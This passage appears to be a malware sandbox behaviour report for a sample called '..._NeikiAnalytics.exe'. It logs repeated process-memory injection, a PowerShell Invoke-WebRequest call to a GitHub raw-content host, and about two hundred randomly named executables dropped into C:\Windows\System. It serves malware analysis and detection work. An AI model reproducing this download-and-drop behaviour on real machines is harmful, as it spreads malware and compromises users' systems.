PID 2104 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\SEgDtWK.exe
PID 2104 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\SEgDtWK.exe
PID 2104 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\SEgDtWK.exe
PID 2104 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\IxotWxT.exe
PID 2104 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\IxotWxT.exe
PID 2104 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\IxotWxT.exe
PID 2104 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\ddNqIYi.exe
PID 2104 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\ddNqIYi.exe
PID 2104 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\ddNqIYi.exe
PID 2104 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\QhMgukx.exe
PID 2104 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\QhMgukx.exe
PID 2104 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\QhMgukx.exe
PID 2104 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dxMeFqq.exe
PID 2104 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dxMeFqq.exe
PID 2104 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dxMeFqq.exe
PID 2104 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dlgUdEW.exe
PID 2104 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dlgUdEW.exe
PID 2104 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dlgUdEW.exe
PID 2104 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\cvhaHCh.exe
PID 2104 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\cvhaHCh.exe
PID 2104 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\cvhaHCh.exe
PID 2104 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\rnSGyZj.exe
PID 2104 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\rnSGyZj.exe
PID 2104 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\rnSGyZj.exe
PID 2104 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\AOFoZlJ.exe
PID 2104 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\AOFoZlJ.exe
PID 2104 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\AOFoZlJ.exe
PID 2104 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xJjMYFB.exe
PID 2104 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xJjMYFB.exe
PID 2104 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xJjMYFB.exe
PID 2104 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\fnkPzvD.exe
PID 2104 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\fnkPzvD.exe
PID 2104 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\fnkPzvD.exe
PID 2104 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\HEPBsWU.exe
PID 2104 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\HEPBsWU.exe
PID 2104 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\HEPBsWU.exe
PID 2104 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\VKwSigU.exe
PID 2104 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\VKwSigU.exe
PID 2104 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\VKwSigU.exe
PID 2104 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\TWfkUTH.exe
PID 2104 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\TWfkUTH.exe
PID 2104 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\TWfkUTH.exe
PID 2104 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\UwCUhag.exe
PID 2104 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\UwCUhag.exe
PID 2104 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\UwCUhag.exe
PID 2104 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\pVnHuEl.exe
PID 2104 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\pVnHuEl.exe
PID 2104 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\pVnHuEl.exe
PID 2104 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\JeNehbm.exe
PID 2104 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\JeNehbm.exe
PID 2104 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\JeNehbm.exe
PID 2104 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\ASlsBWT.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\dLdNVMF.exe

C:\Windows\System\dLdNVMF.exe

C:\Windows\System\pQQStOy.exe

C:\Windows\System\pQQStOy.exe

C:\Windows\System\GRPMjHs.exe

C:\Windows\System\GRPMjHs.exe

C:\Windows\System\SEgDtWK.exe

C:\Windows\System\SEgDtWK.exe

C:\Windows\System\IxotWxT.exe

C:\Windows\System\IxotWxT.exe

C:\Windows\System\ddNqIYi.exe

C:\Windows\System\ddNqIYi.exe

C:\Windows\System\QhMgukx.exe

C:\Windows\System\QhMgukx.exe

C:\Windows\System\dxMeFqq.exe

C:\Windows\System\dxMeFqq.exe

C:\Windows\System\dlgUdEW.exe

C:\Windows\System\dlgUdEW.exe

C:\Windows\System\cvhaHCh.exe

C:\Windows\System\cvhaHCh.exe

C:\Windows\System\rnSGyZj.exe

C:\Windows\System\rnSGyZj.exe

C:\Windows\System\AOFoZlJ.exe

C:\Windows\System\AOFoZlJ.exe

C:\Windows\System\xJjMYFB.exe

C:\Windows\System\xJjMYFB.exe

C:\Windows\System\fnkPzvD.exe

C:\Windows\System\fnkPzvD.exe

C:\Windows\System\HEPBsWU.exe

C:\Windows\System\HEPBsWU.exe

C:\Windows\System\VKwSigU.exe

C:\Windows\System\VKwSigU.exe

C:\Windows\System\TWfkUTH.exe

C:\Windows\System\TWfkUTH.exe

C:\Windows\System\UwCUhag.exe

C:\Windows\System\UwCUhag.exe

C:\Windows\System\pVnHuEl.exe

C:\Windows\System\pVnHuEl.exe

C:\Windows\System\JeNehbm.exe

C:\Windows\System\JeNehbm.exe

C:\Windows\System\ASlsBWT.exe

C:\Windows\System\ASlsBWT.exe

C:\Windows\System\TiXqJSs.exe

C:\Windows\System\TiXqJSs.exe

C:\Windows\System\fZzgOAH.exe

C:\Windows\System\fZzgOAH.exe

C:\Windows\System\Bnoleor.exe

C:\Windows\System\Bnoleor.exe

C:\Windows\System\RtDoYRP.exe

C:\Windows\System\RtDoYRP.exe

C:\Windows\System\HiNLQSh.exe

C:\Windows\System\HiNLQSh.exe

C:\Windows\System\ofeXVXI.exe

C:\Windows\System\ofeXVXI.exe

C:\Windows\System\iHhRKfg.exe

C:\Windows\System\iHhRKfg.exe

C:\Windows\System\Lqwywcq.exe

C:\Windows\System\Lqwywcq.exe

C:\Windows\System\zSZiufG.exe

C:\Windows\System\zSZiufG.exe

C:\Windows\System\TWJalSQ.exe

C:\Windows\System\TWJalSQ.exe

C:\Windows\System\JILWwNi.exe

C:\Windows\System\JILWwNi.exe

C:\Windows\System\gRPHbpG.exe

C:\Windows\System\gRPHbpG.exe

C:\Windows\System\vPsGhOX.exe

C:\Windows\System\vPsGhOX.exe

C:\Windows\System\kvuentt.exe

C:\Windows\System\kvuentt.exe

C:\Windows\System\FkKXgKc.exe

C:\Windows\System\FkKXgKc.exe

C:\Windows\System\ykgmVFq.exe

C:\Windows\System\ykgmVFq.exe

C:\Windows\System\WuSQWiY.exe

C:\Windows\System\WuSQWiY.exe

C:\Windows\System\URmORMY.exe

C:\Windows\System\URmORMY.exe

C:\Windows\System\ikNnGAq.exe

C:\Windows\System\ikNnGAq.exe

C:\Windows\System\mfPAwYt.exe

C:\Windows\System\mfPAwYt.exe

C:\Windows\System\fauItDy.exe

C:\Windows\System\fauItDy.exe

C:\Windows\System\rRBUVva.exe

C:\Windows\System\rRBUVva.exe

C:\Windows\System\dhKalZv.exe

C:\Windows\System\dhKalZv.exe

C:\Windows\System\LlmRMEZ.exe

C:\Windows\System\LlmRMEZ.exe

C:\Windows\System\RjRdRde.exe

C:\Windows\System\RjRdRde.exe

C:\Windows\System\KOnIerD.exe

C:\Windows\System\KOnIerD.exe

C:\Windows\System\YxHQfWs.exe

C:\Windows\System\YxHQfWs.exe

C:\Windows\System\Etpcnph.exe

C:\Windows\System\Etpcnph.exe

C:\Windows\System\EcOjBQr.exe

C:\Windows\System\EcOjBQr.exe

C:\Windows\System\yMrlbaF.exe

C:\Windows\System\yMrlbaF.exe

C:\Windows\System\DdbJSkl.exe

C:\Windows\System\DdbJSkl.exe

C:\Windows\System\UbhgANP.exe

C:\Windows\System\UbhgANP.exe

C:\Windows\System\XNPDwMj.exe

C:\Windows\System\XNPDwMj.exe

C:\Windows\System\uchzWns.exe

C:\Windows\System\uchzWns.exe

C:\Windows\System\vieQIYR.exe

C:\Windows\System\vieQIYR.exe

C:\Windows\System\JqHXraJ.exe

C:\Windows\System\JqHXraJ.exe

C:\Windows\System\eRpDBFl.exe

C:\Windows\System\eRpDBFl.exe

C:\Windows\System\UhcsSjc.exe

C:\Windows\System\UhcsSjc.exe

C:\Windows\System\EgMaefN.exe

C:\Windows\System\EgMaefN.exe

C:\Windows\System\zhjKYeo.exe

C:\Windows\System\zhjKYeo.exe

C:\Windows\System\keiZCXV.exe

C:\Windows\System\keiZCXV.exe

C:\Windows\System\JncnkzX.exe

C:\Windows\System\JncnkzX.exe

C:\Windows\System\xlmgJmX.exe

C:\Windows\System\xlmgJmX.exe

C:\Windows\System\RqBugwe.exe

C:\Windows\System\RqBugwe.exe

C:\Windows\System\FkiBrmI.exe

C:\Windows\System\FkiBrmI.exe

C:\Windows\System\XlzyVBH.exe

C:\Windows\System\XlzyVBH.exe

C:\Windows\System\locJLfj.exe

C:\Windows\System\locJLfj.exe

C:\Windows\System\kXWXJpx.exe

C:\Windows\System\kXWXJpx.exe

C:\Windows\System\WXeZTNJ.exe

C:\Windows\System\WXeZTNJ.exe

C:\Windows\System\tLWFHME.exe

C:\Windows\System\tLWFHME.exe

C:\Windows\System\oRzsPhx.exe

C:\Windows\System\oRzsPhx.exe

C:\Windows\System\sHznLxz.exe

C:\Windows\System\sHznLxz.exe

C:\Windows\System\aZecunA.exe

C:\Windows\System\aZecunA.exe

C:\Windows\System\qWhsZJh.exe

C:\Windows\System\qWhsZJh.exe

C:\Windows\System\yXulIxx.exe

C:\Windows\System\yXulIxx.exe

C:\Windows\System\mimhXxG.exe

C:\Windows\System\mimhXxG.exe

C:\Windows\System\WcKCLsz.exe

C:\Windows\System\WcKCLsz.exe

C:\Windows\System\NXVPVKF.exe

C:\Windows\System\NXVPVKF.exe

C:\Windows\System\nvERgWR.exe

C:\Windows\System\nvERgWR.exe

C:\Windows\System\Bqwgohf.exe

C:\Windows\System\Bqwgohf.exe

C:\Windows\System\leTCOVQ.exe

C:\Windows\System\leTCOVQ.exe

C:\Windows\System\Ndgydnn.exe

C:\Windows\System\Ndgydnn.exe

C:\Windows\System\wJLIJwU.exe

C:\Windows\System\wJLIJwU.exe

C:\Windows\System\gVkEGvF.exe

C:\Windows\System\gVkEGvF.exe

C:\Windows\System\GZdTdch.exe

C:\Windows\System\GZdTdch.exe

C:\Windows\System\rNDQAHD.exe

C:\Windows\System\rNDQAHD.exe

C:\Windows\System\RpvhoNA.exe

C:\Windows\System\RpvhoNA.exe

C:\Windows\System\XmyfoBD.exe

C:\Windows\System\XmyfoBD.exe

C:\Windows\System\IniwopB.exe

C:\Windows\System\IniwopB.exe

C:\Windows\System\QtlVDRl.exe

C:\Windows\System\QtlVDRl.exe

C:\Windows\System\TqMGfVg.exe

C:\Windows\System\TqMGfVg.exe

C:\Windows\System\VoeaJmt.exe

C:\Windows\System\VoeaJmt.exe

C:\Windows\System\BxtJgvi.exe

C:\Windows\System\BxtJgvi.exe

C:\Windows\System\UjXWTMo.exe

C:\Windows\System\UjXWTMo.exe

C:\Windows\System\UuiDgYP.exe

C:\Windows\System\UuiDgYP.exe

C:\Windows\System\SsSvSPr.exe

C:\Windows\System\SsSvSPr.exe

C:\Windows\System\vdiNPAm.exe

C:\Windows\System\vdiNPAm.exe

C:\Windows\System\RkiYxxZ.exe

C:\Windows\System\RkiYxxZ.exe

C:\Windows\System\fshQNox.exe

C:\Windows\System\fshQNox.exe

C:\Windows\System\AGIeCJz.exe

C:\Windows\System\AGIeCJz.exe

C:\Windows\System\CYmKokn.exe

C:\Windows\System\CYmKokn.exe

C:\Windows\System\Cxtgggy.exe

C:\Windows\System\Cxtgggy.exe

C:\Windows\System\xZlMINO.exe

C:\Windows\System\xZlMINO.exe

C:\Windows\System\RELdvUX.exe

C:\Windows\System\RELdvUX.exe

C:\Windows\System\XTKnrgb.exe

C:\Windows\System\XTKnrgb.exe

C:\Windows\System\XfekiKb.exe

C:\Windows\System\XfekiKb.exe

C:\Windows\System\bUhsWQZ.exe

C:\Windows\System\bUhsWQZ.exe

C:\Windows\System\MrxqXTX.exe

C:\Windows\System\MrxqXTX.exe

C:\Windows\System\FaUqixM.exe

C:\Windows\System\FaUqixM.exe

C:\Windows\System\fGEIGkg.exe

C:\Windows\System\fGEIGkg.exe

C:\Windows\System\MKVVTcM.exe

C:\Windows\System\MKVVTcM.exe

C:\Windows\System\BZFjzcy.exe

C:\Windows\System\BZFjzcy.exe

C:\Windows\System\cnjdfNf.exe

C:\Windows\System\cnjdfNf.exe

C:\Windows\System\aJxIWWw.exe

C:\Windows\System\aJxIWWw.exe

C:\Windows\System\VQdLmGH.exe

C:\Windows\System\VQdLmGH.exe

C:\Windows\System\pVbaPCI.exe

C:\Windows\System\pVbaPCI.exe

C:\Windows\System\FsQHHPA.exe

C:\Windows\System\FsQHHPA.exe

C:\Windows\System\nXJcfVN.exe

C:\Windows\System\nXJcfVN.exe

C:\Windows\System\igRwWzb.exe

C:\Windows\System\igRwWzb.exe

C:\Windows\System\wIUncpL.exe

C:\Windows\System\wIUncpL.exe

C:\Windows\System\UtZKbpZ.exe

C:\Windows\System\UtZKbpZ.exe

C:\Windows\System\eaVUwqE.exe

C:\Windows\System\eaVUwqE.exe

C:\Windows\System\VVQIwBr.exe

C:\Windows\System\VVQIwBr.exe

C:\Windows\System\UxxaqGY.exe

C:\Windows\System\UxxaqGY.exe

C:\Windows\System\rfiptas.exe

C:\Windows\System\rfiptas.exe

C:\Windows\System\UURqlmb.exe

C:\Windows\System\UURqlmb.exe

C:\Windows\System\VCznvmL.exe

C:\Windows\System\VCznvmL.exe

C:\Windows\System\CFrSXKb.exe

C:\Windows\System\CFrSXKb.exe

C:\Windows\System\tnEUFQQ.exe

C:\Windows\System\tnEUFQQ.exe

C:\Windows\System\rQPwAzz.exe

C:\Windows\System\rQPwAzz.exe

C:\Windows\System\tMeZciV.exe

C:\Windows\System\tMeZciV.exe

C:\Windows\System\DYzRwtc.exe

C:\Windows\System\DYzRwtc.exe

C:\Windows\System\oGNdlUn.exe

C:\Windows\System\oGNdlUn.exe

C:\Windows\System\smOgbbI.exe

C:\Windows\System\smOgbbI.exe

C:\Windows\System\PTrlKVW.exe

C:\Windows\System\PTrlKVW.exe

C:\Windows\System\gKbUApf.exe

C:\Windows\System\gKbUApf.exe

C:\Windows\System\QysFiQY.exe

C:\Windows\System\QysFiQY.exe

C:\Windows\System\XoUNIRh.exe

C:\Windows\System\XoUNIRh.exe

C:\Windows\System\RxOwGIp.exe

C:\Windows\System\RxOwGIp.exe

C:\Windows\System\ddGFCux.exe

C:\Windows\System\ddGFCux.exe

C:\Windows\System\OheICwM.exe

C:\Windows\System\OheICwM.exe

C:\Windows\System\EDZtJNW.exe

C:\Windows\System\EDZtJNW.exe

C:\Windows\System\ZyNMuVk.exe

C:\Windows\System\ZyNMuVk.exe

C:\Windows\System\gLbOjdA.exe

C:\Windows\System\gLbOjdA.exe

C:\Windows\System\trkQkcJ.exe

C:\Windows\System\trkQkcJ.exe

C:\Windows\System\svlRoVf.exe

C:\Windows\System\svlRoVf.exe

C:\Windows\System\BFgkhfG.exe

C:\Windows\System\BFgkhfG.exe

C:\Windows\System\nfQDwQB.exe

C:\Windows\System\nfQDwQB.exe

C:\Windows\System\TJgaAtv.exe

C:\Windows\System\TJgaAtv.exe

C:\Windows\System\lucLSZz.exe

C:\Windows\System\lucLSZz.exe

C:\Windows\System\AduOXyy.exe

C:\Windows\System\AduOXyy.exe

C:\Windows\System\SmIMfUU.exe

C:\Windows\System\SmIMfUU.exe

C:\Windows\System\TmYhEqY.exe

C:\Windows\System\TmYhEqY.exe

C:\Windows\System\QmsuDEo.exe

C:\Windows\System\QmsuDEo.exe

C:\Windows\System\BVxYzOs.exe

C:\Windows\System\BVxYzOs.exe

C:\Windows\System\BkcBYJZ.exe

C:\Windows\System\BkcBYJZ.exe

C:\Windows\System\tMmGxRL.exe

C:\Windows\System\tMmGxRL.exe

C:\Windows\System\RofbnAg.exe

C:\Windows\System\RofbnAg.exe

C:\Windows\System\uSZcwMz.exe

C:\Windows\System\uSZcwMz.exe

C:\Windows\System\WXQNkGg.exe

C:\Windows\System\WXQNkGg.exe

C:\Windows\System\qmQcaEb.exe

C:\Windows\System\qmQcaEb.exe

C:\Windows\System\wgKuUmW.exe

C:\Windows\System\wgKuUmW.exe

C:\Windows\System\OFizedm.exe

C:\Windows\System\OFizedm.exe

C:\Windows\System\ZqoJMhi.exe

C:\Windows\System\ZqoJMhi.exe

C:\Windows\System\fwAVOAx.exe

C:\Windows\System\fwAVOAx.exe

C:\Windows\System\ROqwRuH.exe

C:\Windows\System\ROqwRuH.exe

C:\Windows\System\DpaagDU.exe

C:\Windows\System\DpaagDU.exe

C:\Windows\System\ehIvJEe.exe

C:\Windows\System\ehIvJEe.exe

C:\Windows\System\eHlKtZj.exe

C:\Windows\System\eHlKtZj.exe

C:\Windows\System\OYfgwLP.exe

C:\Windows\System\OYfgwLP.exe

C:\Windows\System\jkZgaGT.exe

C:\Windows\System\jkZgaGT.exe

C:\Windows\System\nDwGvGT.exe

C:\Windows\System\nDwGvGT.exe

C:\Windows\System\JFtcLAT.exe

C:\Windows\System\JFtcLAT.exe

C:\Windows\System\xvzuGst.exe

C:\Windows\System\xvzuGst.exe

C:\Windows\System\gYwywrO.exe

C:\Windows\System\gYwywrO.exe

C:\Windows\System\PWLsOpm.exe

C:\Windows\System\PWLsOpm.exe

C:\Windows\System\YRVDJqC.exe

C:\Windows\System\YRVDJqC.exe

C:\Windows\System\MFePnwR.exe

C:\Windows\System\MFePnwR.exe

C:\Windows\System\YYUlJCV.exe

C:\Windows\System\YYUlJCV.exe

C:\Windows\System\uOoLPAw.exe

C:\Windows\System\uOoLPAw.exe

C:\Windows\System\ktqMyhh.exe

C:\Windows\System\ktqMyhh.exe

C:\Windows\System\lKcneOL.exe

C:\Windows\System\lKcneOL.exe

C:\Windows\System\pOoJxjG.exe

C:\Windows\System\pOoJxjG.exe

C:\Windows\System\MwroYPp.exe

C:\Windows\System\MwroYPp.exe

C:\Windows\System\xPMZCqv.exe

C:\Windows\System\xPMZCqv.exe

C:\Windows\System\jeCvCRW.exe

C:\Windows\System\jeCvCRW.exe

C:\Windows\System\MPynSxV.exe

C:\Windows\System\MPynSxV.exe

C:\Windows\System\APktufF.exe

C:\Windows\System\APktufF.exe

C:\Windows\System\zkVbUob.exe

C:\Windows\System\zkVbUob.exe

C:\Windows\System\gJpyhnD.exe

C:\Windows\System\gJpyhnD.exe

C:\Windows\System\pJImKKa.exe

C:\Windows\System\pJImKKa.exe

C:\Windows\System\QlgvFzk.exe

C:\Windows\System\QlgvFzk.exe

C:\Windows\System\gpimxZW.exe

C:\Windows\System\gpimxZW.exe

C:\Windows\System\mRDNjTS.exe

C:\Windows\System\mRDNjTS.exe

C:\Windows\System\fNCGYoS.exe

C:\Windows\System\fNCGYoS.exe

C:\Windows\System\VjNCpmP.exe

C:\Windows\System\VjNCpmP.exe

C:\Windows\System\jdGPuFu.exe

C:\Windows\System\jdGPuFu.exe

C:\Windows\System\bGMEehM.exe

C:\Windows\System\bGMEehM.exe

C:\Windows\System\cEsublh.exe

C:\Windows\System\cEsublh.exe

C:\Windows\System\tZCrAUj.exe

C:\Windows\System\tZCrAUj.exe

C:\Windows\System\FRNGMtL.exe

C:\Windows\System\FRNGMtL.exe

C:\Windows\System\Alrrdlk.exe

C:\Windows\System\Alrrdlk.exe

C:\Windows\System\FqnxURl.exe

C:\Windows\System\FqnxURl.exe

C:\Windows\System\UPBhSPi.exe

C:\Windows\System\UPBhSPi.exe

C:\Windows\System\LzQvtuJ.exe

C:\Windows\System\LzQvtuJ.exe

C:\Windows\System\BwfCwuv.exe

C:\Windows\System\BwfCwuv.exe

C:\Windows\System\XAerZsB.exe

C:\Windows\System\XAerZsB.exe

C:\Windows\System\tgEVGQU.exe

C:\Windows\System\tgEVGQU.exe

C:\Windows\System\NyNZnsh.exe

C:\Windows\System\NyNZnsh.exe

C:\Windows\System\uYHAptp.exe

C:\Windows\System\uYHAptp.exe

C:\Windows\System\ydOGYAY.exe

C:\Windows\System\ydOGYAY.exe

C:\Windows\System\drYaqOY.exe

C:\Windows\System\drYaqOY.exe

C:\Windows\System\wueWKwA.exe

C:\Windows\System\wueWKwA.exe

C:\Windows\System\YcwTndv.exe

C:\Windows\System\YcwTndv.exe

C:\Windows\System\CYlNaND.exe

C:\Windows\System\CYlNaND.exe

C:\Windows\System\aYgCQpw.exe

C:\Windows\System\aYgCQpw.exe

C:\Windows\System\KMxemSF.exe

C:\Windows\System\KMxemSF.exe

C:\Windows\System\KdrzoYZ.exe

C:\Windows\System\KdrzoYZ.exe

C:\Windows\System\MhwYGSY.exe

C:\Windows\System\MhwYGSY.exe

C:\Windows\System\VwvowMw.exe

C:\Windows\System\VwvowMw.exe

C:\Windows\System\RUmcVqc.exe

C:\Windows\System\RUmcVqc.exe

C:\Windows\System\EeyuLjI.exe

C:\Windows\System\EeyuLjI.exe

C:\Windows\System\jBcRmZh.exe

C:\Windows\System\jBcRmZh.exe

C:\Windows\System\HYHRVhm.exe

C:\Windows\System\HYHRVhm.exe

C:\Windows\System\RRGDzsi.exe

C:\Windows\System\RRGDzsi.exe

C:\Windows\System\DrfnFMW.exe

C:\Windows\System\DrfnFMW.exe

C:\Windows\System\KKZzxoc.exe

C:\Windows\System\KKZzxoc.exe

C:\Windows\System\EZHIryn.exe

C:\Windows\System\EZHIryn.exe

C:\Windows\System\hvUWjPo.exe

C:\Windows\System\hvUWjPo.exe

C:\Windows\System\pAZxBTh.exe

C:\Windows\System\pAZxBTh.exe

C:\Windows\System\ErCGVyY.exe

C:\Windows\System\ErCGVyY.exe

C:\Windows\System\byUabeI.exe

C:\Windows\System\byUabeI.exe

C:\Windows\System\YqJVJXY.exe

C:\Windows\System\YqJVJXY.exe

C:\Windows\System\tAYHfYB.exe

C:\Windows\System\tAYHfYB.exe

C:\Windows\System\fkgqhLx.exe

C:\Windows\System\fkgqhLx.exe

C:\Windows\System\BCUWMFp.exe

C:\Windows\System\BCUWMFp.exe

C:\Windows\System\fBAELJK.exe

C:\Windows\System\fBAELJK.exe

C:\Windows\System\gkEZEuq.exe

C:\Windows\System\gkEZEuq.exe

C:\Windows\System\SWfzeLS.exe

C:\Windows\System\SWfzeLS.exe

C:\Windows\System\mILasxq.exe

C:\Windows\System\mILasxq.exe

C:\Windows\System\DiuoNpG.exe

C:\Windows\System\DiuoNpG.exe

C:\Windows\System\pTvpQVQ.exe

C:\Windows\System\pTvpQVQ.exe

C:\Windows\System\gdCiwVU.exe

C:\Windows\System\gdCiwVU.exe

C:\Windows\System\RSyklKC.exe

C:\Windows\System\RSyklKC.exe

C:\Windows\System\MWXkQqD.exe

C:\Windows\System\MWXkQqD.exe

C:\Windows\System\xGwskit.exe

C:\Windows\System\xGwskit.exe

C:\Windows\System\vmMcKcE.exe

C:\Windows\System\vmMcKcE.exe

C:\Windows\System\NHQkzcQ.exe

C:\Windows\System\NHQkzcQ.exe

C:\Windows\System\lxMsevj.exe

C:\Windows\System\lxMsevj.exe

